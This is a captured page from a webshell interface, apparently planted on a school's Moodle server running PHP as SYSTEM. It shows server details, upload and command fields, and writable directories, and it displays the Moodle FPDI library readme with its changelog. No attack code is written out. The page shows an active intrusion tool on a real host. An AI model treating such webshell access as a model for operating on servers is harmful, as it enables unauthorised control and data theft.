403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/triamudom/tuprblearn/mod/assign/feedback/editpdf/fpdi/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/triamudom/tuprblearn/mod/assign/feedback/editpdf/fpdi/readme_moodle.txt
FPDI
==================================

No changes from the upstream version have been made. Both FPDI and FPDF_TPL have
been downloaded and unzipped to this directory.

Information
-----------

URL: http://www.setasign.de/products/pdf-php-solutions/fpdi/
Download from: http://www.setasign.de/products/pdf-php-solutions/fpdi/downloads
Documentation: http://www.setasign.de/products/pdf-php-solutions/fpdi/manuals/
License: The MIT License (MIT)

Installation
------------
1) Download the latest version of fpdi from the url above.
2) Unzip the src directory files into this directory.
3) Update mod/assign/feedback/editpdf/fpdi/Tcpdf/Fpdi.php(or whichever file it has been replaced with) to extend 'pdf' instead of 'TCPDF'.
4) Make a note below of any changes made.

2019/06/18
----------
1/ Updated to 2.2.0
2/ Amended the installation instructions
3/ Updated pdf.php to inherit from the TCPDF version instead of the FPDI generic version
   (Refer https://manuals.setasign.com/fpdi-manual/v2/migrating/#index-4)
4/ Updated pdf.php to account for function changes
   (Refer https://manuals.setasign.com/fpdi-manual/v2/migrating/#index-6)
5/ With the restructure by fpdi, no need to apply patches from MDL-55848 and MDL-60301

Updated by Peter Dias (MDL-65774)

2017/10/03
----------
1/ Updated to 1.6.2
2/ Cherry-picked changes in MDL-55848.
3/ Renamed 'TCPDF' to 'pdf' as stated above.
4/ Applied php7.2 compatibility fix, remove this if it is fixed in next major release (2.0) (MDL-60301).

Updated by Ankit Agarwal<[email protected]> (MDL-60301)

2016/11/15
----------

1) Class not exists check and the empty fpdi_bridge class has been removed from fpdi_bridge.php to fix a behat error.

Updated by Simey Lameze (MDL-55848)

2015/12/04
----------
Updated to FPDI: 1.6.1

1) Changed 'TCPDF' to 'pdf' (as stated above).
2) License changed from Apache Software License 2.0 to The MIT License (MIT).

2015/10/01
----------
Updated to FPDI: 1.5.4

fpdi no longer uses fpdi2tcpdf_bridge.php this has been replaced with fpdi_bridge.php.
fpdi_bridge.php has been modified to extend pdf (lib/pdflib.php) as was done with
fpdi2tcpdf_bridge.php.

Updated by Adrian Greeve (MDL-49515)

------------------
Previous versions:

FPDI: 1.4.4
FPDF_TPL: 1.2.3

Youez - 2016 - github.com/yon3zu
LinuXploit